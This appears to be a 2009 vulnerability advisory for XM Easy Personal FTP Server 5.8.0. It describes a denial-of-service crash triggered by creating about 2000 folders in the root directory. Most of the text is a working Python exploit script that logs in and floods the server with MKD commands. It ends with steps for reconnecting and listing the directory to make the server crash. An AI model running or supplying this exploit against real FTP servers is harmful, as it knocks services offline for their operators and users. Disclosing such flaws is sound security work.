Date of Discovery: 24-Nov-2009
Credits:leinakesi[at]gmail.com
Vendor: Dxmsoft
*******************************************************************************
Affected:
XM Easy Personal FTP Server 5.8.0
Earlier versions may also be affected
*******************************************************************************
Overview:
XM Easy Personal FTP Server failed to handle more than 2000 files or
folders in
the root directory.
*******************************************************************************
Details:
if you could log on the server, take the following steps and the server
will
crash which lead to DoS.
1.upload 2000 files or folders.
2.close the current connection.
3.use a ftp client to reconnect the server.
user ...
pass ...
port ...
list ...
crash!!!!!!
*******************************************************************************
Exploit example:
1.upload 2000 folders.
#!/usr/bin/python
import socket
import sys
def Usage():
print ("Usage: ./expl.py <serv_ip> <Username> <password>\n")
print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")
if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
test_string='a'
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("Connection error!")
sys.exit(1)
r=sock.recv(1024)
sock.send("user %s\r\n" %username)
r=sock.recv(1024)
sock.send("pass %s\r\n" %passwd)
for i in range(1,200):
sock.send("mkd " + "a" * i +"\r\n")
print "[-] " + ("mkd " + "a" * i +"\r\n")
r=sock.recv(1024)
print "[+] " + r + "\r\n"
for i in range(1,200):
sock.send("mkd " + "b" * i +"\r\n")
print "[-] " + ("mkd " + "b" * i +"\r\n")
r=sock.recv(1024)
print "[+] " + r + "\r\n"
for i in range(1,200):
sock.send("mkd " + "c" * i +"\r\n")
print "[-] " + ("mkd " + "c" * i +"\r\n")
r=sock.recv(1024)
print "[+] " + r + "\r\n"
for i in range(1,200):
sock.send("mkd " + "d" * i +"\r\n")
print "[-] " + ("mkd " + "d" * i +"\r\n")
r=sock.recv(1024)
print "[+] " + r + "\r\n"
for i in range(1,200):
sock.send("mkd " + "e" * i +"\r\n")
print "[-] " + ("mkd " + "e" * i +"\r\n")
r=sock.recv(1024)
print "[+] " + r + "\r\n"
for i in range(1,200):
sock.send("mkd " + "f" * i +"\r\n")
print "[-] " + ("mkd " + "f" * i +"\r\n")
r=sock.recv(1024)
print "[+] " + r + "\r\n"
for i in range(1,200):
sock.send("mkd " + "g" * i +"\r\n")
print "[-] " + ("mkd " + "g" * i +"\r\n")
r=sock.recv(1024)
print "[+] " + r + "\r\n"
for i in range(1,200):
sock.send("mkd " + "h" * i +"\r\n")
print "[-] " + ("mkd " + "h" * i +"\r\n")
r=sock.recv(1024)
print "[+] " + r + "\r\n"
for i in range(1,200):
sock.send("mkd " + "i" * i +"\r\n")
print "[-] " + ("mkd " + "i" * i +"\r\n")
r=sock.recv(1024)
print "[+] " + r + "\r\n"
for i in range(1,200):
sock.send("mkd " + "j" * i +"\r\n")
print "[-] " + ("mkd " + "j" * i +"\r\n")
r=sock.recv(1024)
print "[+] " + r + "\r\n"
sock.close()
sys.exit(0);
2.use a ftp client to reconnect the server
for example:
start->run->cmd->ftp 127.0.0.1->*****->*****->dir
